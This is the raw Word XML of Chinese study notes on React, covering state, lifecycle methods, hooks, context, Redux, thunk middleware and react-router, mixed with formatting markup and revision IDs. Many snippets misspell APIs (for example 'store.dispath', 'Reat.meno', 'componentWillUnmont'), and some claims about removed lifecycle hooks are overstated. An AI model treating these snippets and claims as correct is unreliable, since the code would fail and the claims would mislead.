        <w:ind w:leftChars="0" w:firstLine="630" w:firstLine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&lt;div&gt;welcome2,{this.props.name}&lt;/div&gt;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注意：react里面没有双向绑定的，只有单向数据流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state例子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React，{Component}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Clock extends Component{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State={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Date:new Date()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componentDidMount(){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This.timer =setInterval(()=&gt;{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This.setState({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Date:new Date()</w:t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componentWillUnmont(){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clearInterval(this.timer)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{this.state.date.toString()}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//批量执行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This.setDate({count:this.state.count+1})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三次执行会合并成一个，只执行了一次，结果是2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正确的写法是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This.setState((prevState)=&gt;{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Counter:prevState.counter+1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条件语句和循环语句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CartSample extends Component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状态初始化一般放在构造器中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constructor(props)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super(props);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//固定写法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this.state =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//里面在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constructor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需要加thsi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goods: [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id: 1, text: "web全栈架构师" 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 id: 2, text: "python全栈架构师"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]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Text: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This.addGood = this.addGood.bind(this)//绑定作用域的第二种方法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addToCart = good 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newCart = [...this.state.cart]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idx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textChange =(e)=&gt;{//不用箭头函数会出现this的指向问题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This.setState({ </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="840" w:leftChars="40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Text:e.target.value</w:t>
      </w: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="840" w:leftChars="100" w:hanging="630" w:hanging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(&lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="1260" w:firstLineChars="6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{/* 条件渲染 */}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{this.props.title &amp;&amp; &lt;h1&gt;{this.props.title}&lt;/h1&gt;}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{/* 列表渲染 */}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&lt;ul&gt;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{this.state.goods.map(good =&gt; (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&lt;li key={good.id}&gt;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{good.text}&lt;/li&gt;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//写多一个参数传参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&lt;button onClick={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()=&gt;{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This.addToCart(good)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="2310" w:firstLineChars="1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310" w:firstLineChars="1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 w:firstLine="1890" w:firstLineChars="9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1890" w:firstLineChars="9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}&gt;&lt;/button&gt;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))}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&lt;/ul&gt;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{/* 事件绑定 */}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&lt;input type=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text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value ={this.state.text} onChange={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This.textChage</w:t>
      </w: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 /&gt;</w:t>
      </w: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生命周期函数：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"react";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Lifecycle extends Component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constructor(props)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super(props);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常用于初始化状态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console.log("1.组件构造函数执行");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componentWillMount()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此时可以访问状态和属性，可进行api调用等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console.log("2.组件将要挂载");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componentDidMount()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组件已挂载，可进行状态更新操作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console.log("3.组件已挂载");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componentWillReceiveProps() {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//第一次组件渲染不会执行，要第二次prop变化才触发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父组件传递的属性有变化，做相应响应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console.log("4.将要接收属性传递");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shouldComponentUpdate()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组件是否需要更新，需要返回布尔值结果，优化点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console.log("5.组件是否需要更新？");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true;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componentWillUpdate()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组件将要更新，可做更新统计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console.log("6.组件将要更新");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componentDidUpdate()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组件更新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console.log("7.组件已更新");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componentWillUnmount()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组件将要卸载, 可做清理工作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console.log("8.组件将要卸载");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console.log("组件渲染");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&lt;div&gt;生命周期探究&lt;/div&gt;;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触发render更新的方法是setState 变化和props的变化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16.4以后的版本加will的钩子都删掉了,因为引进了异步渲染机制，以前的will钩子会被多次执行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取而代之是getDerivedStateFromProps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5420" cy="3301365"/>
            <wp:effectExtent l="0" t="0" r="11430" b="13335"/>
            <wp:docPr id="5" name="图片 5" descr="158267236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8267236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配置按需加载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安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts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react-app-rewired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取代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react-scripts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，可以扩展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>webpack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>的配置 ，类似</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Open Sans" w:hAnsi="Open Sans" w:eastAsia="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">vue.confifig.js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npm install react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app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rewired@2.0.2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next.0 babel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>plugin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import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Open Sans" w:hAnsi="Open Sans" w:eastAsia="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>--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</w:rPr>
        <w:t xml:space="preserve">save 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在跟目录加文件：config-overrides.js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 injectBabelPlugin } = require("react-app-rewired");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module.exports = function override(config, env)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在默认配置基础上注入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插件名，插件配置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["import", { libraryName: "antd", libraryDirectory: "es", style: "css" }],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["@babel/plugin-proposal-decorators", { legacy: true }],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config;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Packjson.js修改启动配置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"scripts":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"start": "react-app-rewired start",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"build": "react-app-rewired build",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"test": "react-app-rewired test",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"eject": "react-app-rewired eject"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导入需要的组件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React, { Component } from 'react'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import Button from 'antd/lib/button'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import 'antd/dist/antd.css'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{Button} from 'antd'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AntdTest extends Component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&lt;Button type="primary"&gt;按钮&lt;/Button&gt;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React的组件设计思路是状态的组件在父亲组件，展示的组件维护在函数子组件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 在数据没有变化的情况下同过shouldComponentUpdata来判断是否需要更新，达到优化目的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shouldCpmponentUpdate(nextProps){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If(nextProps.data.body===this.props.data.body){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false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}else{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true;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind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也可以用PureComponent,这个是一个shouldCpmponentUpdate的浅比较,不要在调用的时候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传对象，这样不会更新，应该在调用的时候用对象展开的方式：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&lt;Comment key={i} {...data}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Comment extends React.PureComponent{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Render(){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Return ()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高阶组件:就是一个函数，输入一个组件，加强功能后，放回一个新的组件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Comment =  Reat.meno(function(props)){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&lt;div&gt;&lt;/div&gt;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这种形式就拥有了PureComponent 的能力了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高阶组件的例子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原生组件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Kaikeba extends Component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{this.props.stage}-{this.props.name}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//经过修饰的高阶组件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withkaikeba = comp=&gt;{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name=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高阶组件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props =&gt;{ &lt;comp {...props} name={name} }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//调用高阶组件，放回新的组件实例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newComp = withkaikeba(kaikeba);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//使用实例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Hoc extends Component {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newComp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stage="React" /&gt;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react装饰器：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Config-overrides.js下面添加这个插件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config = injectBabelPlugin(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["@babel/plugin-proposal-decorators", { legacy: true }],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config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const NewKaikeba = withLog(withKaikeba(withLog(Kaikeba)));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@withLog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@withKaikeba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@withLog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Kaikeba extends Component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{this.props.stage}-{this.props.name}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class Hoc extends Component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&lt;Kaikeba stage="React" /&gt;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顺序上从上到下的，一层层的调用，装饰器只能修饰class，函数是不行的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react的slot：props.children 就是包含在组件中的代码，相当与vue中的匿名代码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Props.footer 相当与具名插槽：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"react";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Dialog(props)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 style={{ border: `4px solid ${props.color || "blue"}` }}&gt;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{props.children}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 className="footer"&gt;{props.footer}&lt;/div&gt;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WelcomeDialog通过复合提供内容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WelcomeDialog(props)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&lt;Dialog {...props}&gt;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&lt;h1&gt;欢迎光临&lt;/h1&gt;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&lt;p&gt;感谢使用react&lt;/p&gt;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&lt;/Dialog&gt;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function()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footer = &lt;button onClick={() =&gt; alert("确定！")}&gt;确定&lt;/button&gt;;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(&lt;div&gt;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&lt;WelcomeDialog color="green" footer={footer} /&gt;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props.children 其实是个表达式，取决于组件包裹的内容：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23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可以用于函数调用：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Api = {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getUser() {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{ name: "jerry", age: 20 };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Fetcher(props) {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user = Api[props.name]();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props.children(user);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&lt;Fetcher name="getUser"&gt;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{({ name, age }) =&gt; (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&lt;p&gt;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{name}-{age}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&lt;/p&gt;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)}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&lt;/Fetcher&gt;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可以用于过滤标签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Filter({ children, type })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{React.Children.map(children, child =&gt;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if (child.type !== type)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return;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child;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&lt;Filter type="p"&gt;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&lt;h1&gt;react&lt;/h1&gt;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&lt;p&gt;react很不错&lt;/p&gt;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&lt;h1&gt;vue&lt;/h1&gt;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&lt;p&gt;vue很不错&lt;/p&gt;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&lt;/Filter&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23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可以修改组件属性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RadioGroup(props)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{React.Children.map(props.children, child =&gt;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//   vdom不可更改，克隆一个新的去改才行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return React.cloneElement(child, { name: props.name });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})}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//解构出children，其他属性放到rest变量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Radio({children, ...rest})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&lt;label&gt;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&lt;input type="radio" {...rest}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{children}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&lt;/label&gt;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&lt;RadioGroup name="mvvm"&gt;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value="vue"&gt;vue&lt;/Radio&gt;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value="react"&gt;react&lt;/Radio&gt;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&lt;Radio value="angular"&gt;angular&lt;/Radio&gt;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&lt;/RadioGroup&gt;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Hook  表示原来的函数形式的组件也可以用状态了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React,{useState,useEffect}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HookTest(){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//0代表count的初始值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[count,setCount] = useState(0)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多个的情况下：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[age] = useState(20)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[fruit,setFruit] =useState(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banana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[fruits,setFruits] =useState([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banana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app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])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&lt;p&gt;点击了&lt;/p&gt;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 ={ ()=&gt;{setCount(count+1)}}&gt;点击&lt;/button&gt;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effect hook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 useState,usrEffect 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Document.title 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你点击${count}次了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这个钩子相当于合并了componnetDidMount,componentUpdate,componentWillUnmount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//只调用一次的情况下这样配置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//api调用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},[])</w:t>
      </w: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//count变化了才会执行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useEffect(()=&gt;{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//api调用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},[count])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自定义钩子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自定义hook是一个函数，名称用“use"开头，函数内部可以调用其他钩子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//可以用于api请求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useAge(){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[age,setAge] =useState(0)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useEffect(()=&gt;{ //相当于componentDitMount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setTimeout(()=&gt;{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setAge(20)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},2000)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age;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HookTest()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//调用钩子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age = useAge();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&lt;p&gt;年龄：{age ? age : 'loading...'}&lt;/p&gt;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react跨组件传递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React,{useContext}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Mycontent React.createContext();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{Provider,Consumer} = MyContext;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child(prop){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&lt;div&gt;child:{prop.foo}&lt;/div&gt;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child2(){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Const ctx = useContext(MyContext);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&lt;div&gt;child2:{ctx.foo}&lt;/div&gt;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child3 extends React.component{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Static contectType = myContent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Render(){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&lt;div&gt;child3:{this.context.foo}&lt;/div&gt;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ContentTest(){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 value={{foo:bar}}&gt;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&lt;Consumer&gt;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{value=&gt;&lt;child {...value}&gt;&lt;/child&gt;}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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&lt;/Consumer&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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&lt;child2 &gt;&lt;/child&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="630" w:firstLineChars="3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&lt;child3 &gt;&lt;/child&gt;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&lt;provider&gt;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组件设计与实现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参见代码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安装npm i redux -S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Redux中只有同步的概念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通过dispatch(action) 触发action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例子：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新建文件store.js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‘react’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{createStore}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counterReducer = (state=0,action)=&gt;{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Switch(action.type){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Case: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state+1;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Case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state-1;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Default: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createStore(counterReducer)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//引用的组件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ReduxTest(){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&lt;div&gt;{store.getState()}&lt;/div&gt;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onClick={()=&gt;store.dispath({type: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})}&gt;&lt;/button&gt;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&lt;button onClick={()=&gt;store.dispath({type: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})}&gt;&lt;/button&gt;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//使用组件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在index.js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store from "./store";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ReactDOM.render(&lt;App /&gt;, document.getElementById("root"));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//调用dispacth之后，点阅改变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store.subscribe(() =&gt;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ReactDOM.render(&lt;App /&gt;, document.getElementById("root"))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react-redux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安装：npm install react-redux --save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//Store.js文件：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‘react’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{createStore}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counterReducer = (state=0,action)=&gt;{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Switch(action.type){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Case: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add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state+1;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Case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minus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state-1;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Default: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state;</w:t>
      </w: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210" w:firstLineChars="1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createStore(counterReducer)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//ReduxTest代码：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React from "react";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mapStateToProps = state =&gt; ({ num: state.counter });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mapDispatchToProps = { add, minus, asyncAdd };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function ReduxTest({ num, add, minus })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&lt;p&gt;{num}&lt;/p&gt;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&lt;button onClick={minus}&gt;-&lt;/button&gt;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&lt;button onClick={add}&gt;+&lt;/button&gt;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export default connect(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mapStateToProps,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mapDispatchToProps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)(ReduxTest);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Index.js文件：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{Provider}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react-redux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store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./store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&lt;Provider store={store }&gt;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&lt;ReduxTest&gt;&lt;/ReDuxTest&gt;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&lt;/Provider&gt;</w:t>
      </w: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react-thunk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1.安装：npm install redux-thunk -save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在触发action的到达store之前时候事实上可以经过多个中间键的，比如log，thunk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主要目录结构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///Store.js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createStore, applyMiddleware, combineReducers } from "redux";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logger from "redux-logger";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thunk from "redux-thunk";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counterReducer } from "./count.redux";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store = createStore(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combineReducers({ counter: counterReducer}),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applyMiddleware(logger, thunk)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store;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count.redux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.js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counterReducer = (state = 0, action)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 (action.type)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"add":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 + 1;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"minus":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 - 1;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default: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add = () =&gt; ({ type: "add" });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minus = () =&gt; ({ type: "minus" });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asyncAdd = () =&gt; dispatch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做异步操作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setTimeout(()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dispatch({ type: "add" });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 1500);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//主页面引用store.js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Provider } from "react-redux";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store from "./store";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&lt;Provider store={store}&gt;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&lt;ReduxTest /&gt;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&lt;/Provider&gt;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//组件用法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add, minus, asyncAdd } from "../store/count.redux"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//引用方法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mapStateToProps = state =&gt; ({ num: state.counter });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mapDispatchToProps = { add, minus, asyncAdd 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@connect(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mapStateToProps,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mapDispatchToProps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class ReduxTest extends React.Component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render()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const { num, minus, add, asyncAdd } = this.props;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&lt;p&gt;{num}&lt;/p&gt;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onClick={minus}&gt;-&lt;/button&gt;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onClick={add}&gt;+&lt;/button&gt;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&lt;button onClick={asyncAdd}&gt;AsyncAdd&lt;/button&gt;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ReduxTest;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20"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLine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react-rounter 4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安装：npm install react-router-dom -s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基本用法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//新建文件：user.redux.js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initial =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isLogin: false,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loading: false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user = (state = initial, action)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switch (action.type)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"requestLogin":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isLogin: false,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loading: true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case "login":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isLogin: true,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loading: false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default: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return state;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action creator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const login = () =&gt; dispatch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dispatch({ type: "requestLogin" });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  做异步操作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setTimeout(() =&gt; {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dispatch({ type: "login" });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}, 2000);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//RouteSample.js 文件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React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connect } from "react-redux";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import { login } from "../store/user.redux";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Import { BrowserRouter,Link,Route，Switch } from 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‘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react-router-dom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home(params){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&lt;ul&gt;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&lt;Link to="/detail/web"&gt;Web架构师&lt;/Link&gt;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&lt;/li&gt;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&lt;Link to="/detail/python"&gt;Python架构师&lt;/Link&gt;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&lt;/li&gt;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&lt;/ul&gt;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About(params){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//路由嵌套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的时候显示这个组件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//路由为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/about/**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的时候显示下面的组件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//Switch 为没有匹配到 path=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/about/**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的时候显示/about/me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&lt;h3&gt;个人中心&lt;/h3&gt;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&lt;Link to="/about/me"&gt;个人信息&lt;/Link&gt;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&lt;Link to="/about/order"&gt;订单查询&lt;/Link&gt;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&lt;Switch&gt;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&lt;Route path="/about/me" component={() =&gt; &lt;div&gt;Me&lt;/div&gt;}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&lt;Route path="/about/order" component={() =&gt; &lt;div&gt;order&lt;/div&gt;}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&lt;Redirect to="/about/me"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&lt;/Switch&gt;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传递进来路由器对象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Detail(props)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1.history: 导航指令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2.match: 获取参数信息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// 3.location: 当前url信息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console.log(props);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当前课程：{props.match.params.course}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&lt;button onClick={props.history.goBack}&gt;后退&lt;/button&gt;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function NoMatch({ location })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&lt;div&gt;404, {location.pathname}不存在&lt;/div&gt;;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登录组件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Login = connect(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state =&gt; ({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isLogin: state.user.isLogin,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loading: state.user.loading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}),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{ login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)(function({ location, isLogin, login, loading })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const redirect = location.state.redirect || "/";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if (isLogin)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&lt;Redirect to={redirect} /&gt;;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&lt;p&gt;用户登录&lt;/p&gt;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&lt;hr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&lt;button onClick={login} disabled={loading}&gt;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{loading ? "登录中..." : "登录"}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&lt;/button&gt;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&lt;/div&gt;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 路由守卫 希望用法：&lt;PrivateRoute component={About} path="/about" ...&gt;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const PrivateRoute = connect(state =&gt; ({ isLogin: state.user.isLogin }))(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({ component: Comp, isLogin, ...rest }) =&gt;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做认证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// render:根据条件动态渲染组件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&lt;Route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{...rest}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render={props =&gt;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isLogin ?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&lt;Comp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 :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&lt;Redirect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to={{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pathname: "/login",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state: { redirect: props.location.pathname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}}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)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/&gt;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Export default function RouteSamle(){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Return (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&lt;div&gt; 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&lt;BrowserRouter&gt;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&lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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&gt;首页&lt;/link&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="42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&lt;link to=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/about</w:t>
      </w:r>
      <w:r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&gt;首页&lt;/link&gt;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//exact 是路由完成匹配的意思 家这个后/about 就不会显示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//Switch 的意思了只选择一个，如果都不匹配就匹配404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&lt;Switch&gt;</w:t>
      </w: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 exact path="/" component={() =&gt; home}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//路由守卫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&lt;PrivateRoute path="/about" component={About}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&lt;Route path="/detail:course" component={() =&gt; home}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&lt;Route path="/login" component={Login}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{/* 404：没有path，必然匹配 */}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&lt;Route component={NoMatch} /&gt;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&lt;/Switch&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/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leftChars="0" w:firstLine="840" w:firstLineChars="4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&lt;/BrowserRouter&gt;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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="210" w:firstLineChars="100"/>
        <w:jc w:val="both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widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default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CDB47"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="813CDB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B1E500C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="8B1E500C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258799A"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="A25879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6968A19"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="A6968A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EACFD8D"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="AEACFD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B5511F7C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B5511F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6B94C26"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B6B94C2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93D750E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B93D7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BCA2B7F8"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BCA2B7F8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BCC57B4F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BCC57B4F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C4AFF16C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C4AFF1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C74BAA5F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C74BAA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D4C91330"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="D4C913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D6A27C04"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="D6A27C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D7AC5AD8"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="D7AC5A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DBEDB694"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="DBEDB6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F26E1112"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F26E1112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04AB93F2"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="04AB93F2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07078D16"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="07078D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2C95D2FF"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="2C95D2F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10" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="20">
    <w:nsid w:val="3BE92566"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="3BE92566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478B125E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="478B12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72DF83E1"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="72DF83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18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16"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="2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B145E"/>
    <w:rsid w:val="00E370A1"/>
    <w:rsid w:val="01770629"/>
    <w:rsid w:val="01FC4A71"/>
    <w:rsid w:val="02F6415B"/>
    <w:rsid w:val="03560C95"/>
    <w:rsid w:val="03780712"/>
    <w:rsid w:val="037F1BD1"/>
    <w:rsid w:val="04346DC2"/>
    <w:rsid w:val="0459782F"/>
    <w:rsid w:val="047264FE"/>
    <w:rsid w:val="04796082"/>
    <w:rsid w:val="047E1E5B"/>
    <w:rsid w:val="0485337A"/>
    <w:rsid w:val="04994722"/>
    <w:rsid w:val="04A02D41"/>
    <w:rsid w:val="04A02D9E"/>
    <w:rsid w:val="050B5C71"/>
    <w:rsid w:val="051350FC"/>
    <w:rsid w:val="05D10E73"/>
    <w:rsid w:val="060C14DE"/>
    <w:rsid w:val="06504CA5"/>
    <w:rsid w:val="06523406"/>
    <w:rsid w:val="06AC6BF2"/>
    <w:rsid w:val="06C60BEE"/>
    <w:rsid w:val="06DB15E0"/>
    <w:rsid w:val="078430CB"/>
    <w:rsid w:val="078A0CCF"/>
    <w:rsid w:val="07CA6E2C"/>
    <w:rsid w:val="07CD73F0"/>
    <w:rsid w:val="07D7050B"/>
    <w:rsid w:val="082E6F6B"/>
    <w:rsid w:val="08A37D09"/>
    <w:rsid w:val="08B20DF3"/>
    <w:rsid w:val="08DB36A8"/>
    <w:rsid w:val="094C7FF0"/>
    <w:rsid w:val="09551090"/>
    <w:rsid w:val="099719DD"/>
    <w:rsid w:val="09A459AE"/>
    <w:rsid w:val="0A014D49"/>
    <w:rsid w:val="0A055CC2"/>
    <w:rsid w:val="0A750524"/>
    <w:rsid w:val="0AA54374"/>
    <w:rsid w:val="0AA55162"/>
    <w:rsid w:val="0AED7246"/>
    <w:rsid w:val="0B353378"/>
    <w:rsid w:val="0BE5006A"/>
    <w:rsid w:val="0C424F57"/>
    <w:rsid w:val="0C785E18"/>
    <w:rsid w:val="0C893B9D"/>
    <w:rsid w:val="0C993932"/>
    <w:rsid w:val="0CCD0A40"/>
    <w:rsid w:val="0D267961"/>
    <w:rsid w:val="0D4B6D19"/>
    <w:rsid w:val="0DA50F1D"/>
    <w:rsid w:val="0DC25660"/>
    <w:rsid w:val="0E2E027A"/>
    <w:rsid w:val="0E453BE0"/>
    <w:rsid w:val="0EA51486"/>
    <w:rsid w:val="0F2111EE"/>
    <w:rsid w:val="0F2B05FD"/>
    <w:rsid w:val="0FBE5A45"/>
    <w:rsid w:val="1035305A"/>
    <w:rsid w:val="1090315D"/>
    <w:rsid w:val="10C423D7"/>
    <w:rsid w:val="10D81775"/>
    <w:rsid w:val="112F4612"/>
    <w:rsid w:val="1140229B"/>
    <w:rsid w:val="115A16CB"/>
    <w:rsid w:val="122F519B"/>
    <w:rsid w:val="12671E5E"/>
    <w:rsid w:val="131823AE"/>
    <w:rsid w:val="132B1CE1"/>
    <w:rsid w:val="135905D5"/>
    <w:rsid w:val="139F267F"/>
    <w:rsid w:val="140A5B0B"/>
    <w:rsid w:val="14375687"/>
    <w:rsid w:val="14626610"/>
    <w:rsid w:val="14791CC0"/>
    <w:rsid w:val="149E11B5"/>
    <w:rsid w:val="15647C4D"/>
    <w:rsid w:val="156B1A19"/>
    <w:rsid w:val="165B6991"/>
    <w:rsid w:val="1671315C"/>
    <w:rsid w:val="16943222"/>
    <w:rsid w:val="169819C2"/>
    <w:rsid w:val="1814625B"/>
    <w:rsid w:val="18182AA5"/>
    <w:rsid w:val="182E17ED"/>
    <w:rsid w:val="19D22192"/>
    <w:rsid w:val="19E046CD"/>
    <w:rsid w:val="19F53E85"/>
    <w:rsid w:val="19FE4B58"/>
    <w:rsid w:val="1A5A1911"/>
    <w:rsid w:val="1A643A1D"/>
    <w:rsid w:val="1A876643"/>
    <w:rsid w:val="1A891191"/>
    <w:rsid w:val="1AA95ED9"/>
    <w:rsid w:val="1B4A1ABE"/>
    <w:rsid w:val="1B762505"/>
    <w:rsid w:val="1B940A42"/>
    <w:rsid w:val="1BE51E29"/>
    <w:rsid w:val="1C17246C"/>
    <w:rsid w:val="1C175DC1"/>
    <w:rsid w:val="1C583066"/>
    <w:rsid w:val="1C5B7D4F"/>
    <w:rsid w:val="1C686C52"/>
    <w:rsid w:val="1C7714F9"/>
    <w:rsid w:val="1C782618"/>
    <w:rsid w:val="1CBF5BC5"/>
    <w:rsid w:val="1DF46572"/>
    <w:rsid w:val="1E8C1014"/>
    <w:rsid w:val="1EB9339E"/>
    <w:rsid w:val="1EC20C43"/>
    <w:rsid w:val="1EE61BB0"/>
    <w:rsid w:val="1F280D67"/>
    <w:rsid w:val="1F4F74F5"/>
    <w:rsid w:val="1F610C99"/>
    <w:rsid w:val="1F722F32"/>
    <w:rsid w:val="1FD97481"/>
    <w:rsid w:val="200A74C1"/>
    <w:rsid w:val="203C37A9"/>
    <w:rsid w:val="20511202"/>
    <w:rsid w:val="2066397E"/>
    <w:rsid w:val="20B1060D"/>
    <w:rsid w:val="20FC1B64"/>
    <w:rsid w:val="20FE0792"/>
    <w:rsid w:val="21476C32"/>
    <w:rsid w:val="217C6E6A"/>
    <w:rsid w:val="219A27F1"/>
    <w:rsid w:val="22261E41"/>
    <w:rsid w:val="22B21BEE"/>
    <w:rsid w:val="22F9754B"/>
    <w:rsid w:val="22FF7C49"/>
    <w:rsid w:val="234A6E18"/>
    <w:rsid w:val="23A51CDF"/>
    <w:rsid w:val="23CF37AD"/>
    <w:rsid w:val="23DA1028"/>
    <w:rsid w:val="23FB5378"/>
    <w:rsid w:val="24AF4088"/>
    <w:rsid w:val="24D76C5E"/>
    <w:rsid w:val="24DF5CD7"/>
    <w:rsid w:val="250A6819"/>
    <w:rsid w:val="255C6FA8"/>
    <w:rsid w:val="25DA2034"/>
    <w:rsid w:val="25F372B0"/>
    <w:rsid w:val="26541D73"/>
    <w:rsid w:val="265469EF"/>
    <w:rsid w:val="265C3DBC"/>
    <w:rsid w:val="26A97FE4"/>
    <w:rsid w:val="26C73664"/>
    <w:rsid w:val="26F94A87"/>
    <w:rsid w:val="274C0264"/>
    <w:rsid w:val="278A0823"/>
    <w:rsid w:val="283D74B2"/>
    <w:rsid w:val="28F84192"/>
    <w:rsid w:val="290125E8"/>
    <w:rsid w:val="2936547A"/>
    <w:rsid w:val="2958749E"/>
    <w:rsid w:val="297450E7"/>
    <w:rsid w:val="2A07534B"/>
    <w:rsid w:val="2A9E03E5"/>
    <w:rsid w:val="2AB213B9"/>
    <w:rsid w:val="2B013B07"/>
    <w:rsid w:val="2B055A23"/>
    <w:rsid w:val="2B0D1EFF"/>
    <w:rsid w:val="2B34305F"/>
    <w:rsid w:val="2BB62FE0"/>
    <w:rsid w:val="2CE83006"/>
    <w:rsid w:val="2D0E0AE3"/>
    <w:rsid w:val="2D2B030F"/>
    <w:rsid w:val="2D4575BA"/>
    <w:rsid w:val="2D86432C"/>
    <w:rsid w:val="2D8A29E1"/>
    <w:rsid w:val="2DD627A3"/>
    <w:rsid w:val="2EF9793E"/>
    <w:rsid w:val="2F0A4741"/>
